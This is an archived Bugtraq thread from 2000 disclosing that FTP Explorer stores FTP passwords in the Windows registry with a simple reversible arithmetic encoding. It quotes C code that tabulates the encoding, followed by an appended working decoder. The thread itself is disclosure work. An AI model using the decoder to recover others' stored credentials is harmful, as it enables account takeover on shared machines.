[14067] in bugtraq
Re: How the password could be recover using FTP Explorer's
daemon@ATHENA.MIT.EDU (Rishi Lee Khan)
Mon Feb 28 15:01:03 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SOL.4.05.10002280127400.7894-100000@copland.udel.edu>
Date: Mon, 28 Feb 2000 01:30:19 -0500
Reply-To: Rishi Lee Khan <rishi@UDEL.EDU>
From: Rishi Lee Khan <rishi@UDEL.EDU>
X-To: Seth R Arnold <sarnold@WILLAMETTE.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20000225172002.R1123@willamette.edu>
I've noticed similar behavior, and in fact, I've used it to decrypt
passwords I've forgotten. However, I DO think that it is a security hole
that when you uninstall this software, it does NOT delete the registry
entries. Therefore, if one installs FTP Explorer on a machine that
previously had it installed, all of the old passwords and accounts are
still there. So you can log into someone else's stuff. This is especially
a concern here at the University of Delaware as many people install and
remove shareware from public computing sites.
-Rishi
On Fri, 25 Feb 2000, Seth R Arnold wrote:
> Nelson, excuse my asking, but .. is this not the expected behavior?
>
> Any client that stores login/password information must store it in a
> plain-text equivalent form on the hard drive, *unless it prompts the
> user for a key with which to unlock the information*. Unless it uses a
> key supplied by the user, it must be based on something similar to this.
>
> If FTP Explorer is actually a server, then this is insecure -- servers
> should store hashes of passwords, not passwords. If FTP Explorer is an
> ftp client, one would hope it documents the storing of passwords; to my
> way of thinking, not prompting for passwords the next time a site is
> used is documentation enough for anyone that cares about their security.
> Anyone for whom this isn't enough likely doesn't care about their
> security.
>
> If you are worried about other people on your machine getting at the
> password through the registry, then I would hope the security settings
> on the registry are set up to disallow access -- but that would be WinNT
> only.
>
> Don't get me wrong -- this is good detective work. However, to my way of
> thinking, this is also expected behavior.
>
> Flames welcome. Autoreplies "I am out of the office" are not. :)
>
> On Thu, Feb 24, 2000 at 09:18:52PM -0300, Nelson wrote:
> > The scene:
> > user -> nelson
> > pass -> ABC
> >
> > In the Connect window, I typed login == nelson and pass == ***(ABC), and made a
> > connection to my own ftp server. After this, I found this KEY in the Windows
> > REGISTRY:
> > HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER
> >
> > and I found two values:
> > Login = nelson
> > Type = 4A4E52
> >
> > Hmmm... looks like an encrypted password to me...
> >
> > Ok, the crypt function in FTP Explorer works like this:
> > get the ASCII hex value and increment it by 9; if the position in the password
> > changes, increment by 3 per position.
> >
> > In other words, an arithmetic progression.
> >
> > I wrote some code to prove this; look at the result:
> > unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste
> > Criptografia do FTP Explorer v0.6b - por Nelson Brito
> > unreal:~/temp$ more teste
> > [...]
> > A = 4A = 4D = 50
> > `-> correct
> > B = 4B = 4E = 51
> > `-> correct
> > C = 4C = 4F = 52
> > `-> correct
> > [...]
> >
> > Well, the password is 'ABC'... Is it a big security hole? I think so...
> >
> > PS: The credit for starting this thread in BOS-Br <bos@sekure.org> goes to
> > Hever <Hever@vitech.net>.
> >
> > PPS: Sorry about my poor ENGLISH. If you don't understand, don't read. =)
> >
> > My proof...
> >
> > -------begin
> > /*
> > ** This code demonstrates how the "cryptography" of the FTP Explorer
> > ** software works, based on the information passed to BOS-Br by
> > ** Hever<Hever@vitech.net>.
> > **
> > ** author: Nelson Brito
> > ** e-mails: nelson@sekure.org & nelson@secunet.com.br
> > ** program: ftpe-crypt.c
> > **
> > ** ChangeLog:
> > ** v 0.6b - output file added
> > ** - from this version on, all command-line arguments are required
> > ** v 0.5b - long command-line options added
> > ** - problems with the '-h' option fixed thanks to fpm :*( ) )
> > ** v 0.4 - command-line options added, letting the user "set" their
> > ** preferences [a.k.a. getopt(3)]
> > ** v 0.3 - arguments passed to the r2() function added
> > ** - counter to be used as an argument to r2()
> > ** v 0.2 - r2() function developed; u_abort() and logo() added
> > ** - password length increased
> > ** v 0.1 - initial development of the program skeleton, including:
> > ** > special characters removed, i.e. only [a-z][A-Z][0-9]
> > ** > a simple arithmetic progression, without a formula or function
> > **
> > ** Thanks to drk, Morauder and fpm for the help with getopt(3). =)
> > **
> > ** How to compile:
> > ** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <getopt.h>
> > #define VERSION "0.6b"
> >
> > /* One term of the progression: character value n at position p becomes
> > ** n + b + i*p, where b is the base increment and i the per-position
> > ** ratio. The result is written to fp as hex and returned. */
> > int r2(int n, int p, int i, int b, FILE *fp){
> > n = (n + b) + (i * p);
> > fprintf(fp, "= %X ", n);
> > return(n);
> > }
> >
> > /* print usage and exit; never returns */
> > void usage(char *p){
> > fprintf(stderr, "use: %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p);
> > fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p);
> > fprintf(stderr, "options:\n\t -l, --length password's length\n");
> > fprintf(stderr, "\t -i, --increment ASCII Table's increment\n");
> > fprintf(stderr, "\t -r, --ratio PA's ratio\n");
> > fprintf(stderr, "\t -o, --output output file\n");
> > fprintf(stderr, "\nfor ftpe's cryptography use r=3, i=9\n");
> > exit(0);
> > }
> >
> > int main(int ac, char **av){
> > FILE *outlist = NULL;
> > int a = 48; /* start at ASCII '0' */
> > int r = 0, inc = 0, ct = 0, op;
> > static struct option long_options[] = {
> > {"length", required_argument, 0, 'l'},
> > {"ratio", required_argument, 0, 'r'},
> > {"increment", required_argument, 0, 'i'},
> > {"output", required_argument, 0, 'o'},
> > {0, 0, 0, 0}
> > };
> >
> > printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION);
> >
> > if(ac != 9) usage(av[0]);
> >
> > while((op = getopt_long(ac, av, "l:r:i:o:", long_options, NULL)) != -1){
> > switch(op){
> > case 'l':
> > ct = atoi(optarg);
> > break;
> > case 'r':
> > r = atoi(optarg);
> > break;
> > case 'i':
> > inc = atoi(optarg);
> > break;
> > case 'o':
> > if(!(outlist = fopen(optarg, "w"))){
> > fprintf(stderr, "unable to open %s\n", optarg);
> > exit(1);
> > }
> > break;
> > default:
> > usage(av[0]);
> > break;
> > }
> > }
> >
> > /* every option is mandatory: without -o there is nowhere to write,
> > ** and without a positive -l nothing would be written */
> > if(outlist == NULL || ct <= 0) usage(av[0]);
> >
> > /* walk the ASCII table from '0' (48) to 'z' (122), skipping the
> > ** punctuation between '9' and 'A' and between 'Z' and 'a' */
> > while(a < 123){
> > int c;
> >
> > if((a >= 58 && a <= 64) || (a >= 91 && a <= 96)){
> > a++;
> > continue;
> > }
> >
> > fprintf(outlist, "%c ", (char)a);
> > for(c = 0 ; c < ct ; c++) r2(a, c, r, inc, outlist);
> > fprintf(outlist, "\n");
> > a++;
> > }
> >
> > fclose(outlist);
> >
> > return(0);
> > }
> > -------end
> >
> > That's all,
> > --
> > Nelson - nb
>
> --
> Seth Arnold | http://www.willamette.edu/~sarnold/
> Hate spam? See http://maps.vix.com/rbl/ for help
> Hi! I'm a .signature virus! Copy me into
> your ~/.signature to help me spread!
>
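As an added example (not code from this thread, from Nelson's tool, or from FTP Explorer), here is the progression Nelson describes written as an encoder and a decoder, so a reader can check that the registry value 4A4E52 turns back into ABC with no key involved, which is what makes the stored value plaintext-equivalent. The constants 9 and 3 and the two-hex-digits-per-character layout come from the thread; treating each stored value as a single byte is an assumption of this example.

```c
/* Added example: the FTP Explorer "Type" obfuscation as described in the
 * thread: stored[i] = plaintext[i] + 9 + 3*i, written as two hex digits per
 * character (one byte per character is an assumption of this example). */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#define FTPE_INCREMENT 9   /* added to every character */
#define FTPE_RATIO     3   /* additional amount per position */

/* Encode pw as uppercase hex; out needs 2*strlen(pw)+1 bytes. Returns the
 * number of characters encoded, or -1 if out is too small or a value
 * would not fit in one byte (the thread does not say how FTP Explorer
 * handles that case, so it is rejected here). */
int ftpe_encode(const char *pw, char *out, size_t outlen) {
    size_t n = strlen(pw);
    if (outlen < 2 * n + 1) return -1;
    for (size_t i = 0; i < n; i++) {
        int v = (unsigned char)pw[i] + FTPE_INCREMENT + FTPE_RATIO * (int)i;
        if (v > 0xFF) return -1;
        sprintf(out + 2 * i, "%02X", v);
    }
    out[2 * n] = '\0';
    return (int)n;
}

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)toupper((unsigned char)c);
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

/* Reverse the progression: only the position is needed, no key at all.
 * out needs strlen(hex)/2+1 bytes. Returns the plaintext length, or -1
 * on odd length, a bad hex digit, or a non-printable result. */
int ftpe_decode(const char *hex, char *out, size_t outlen) {
    size_t n = strlen(hex);
    if (n % 2 != 0 || outlen < n / 2 + 1) return -1;
    for (size_t i = 0; i < n / 2; i++) {
        int hi = hexval(hex[2 * i]), lo = hexval(hex[2 * i + 1]);
        if (hi < 0 || lo < 0) return -1;
        int v = ((hi << 4) | lo) - FTPE_INCREMENT - FTPE_RATIO * (int)i;
        if (v < 0x20 || v > 0x7E) return -1;
        out[i] = (char)v;
    }
    out[n / 2] = '\0';
    return (int)(n / 2);
}

int main(void) {
    char hex[64], pw[32];
    if (ftpe_encode("ABC", hex, sizeof hex) > 0) printf("ABC -> %s\n", hex);
    if (ftpe_decode("4A4E52", pw, sizeof pw) > 0) printf("4A4E52 -> %s\n", pw);
    return 0;
}
```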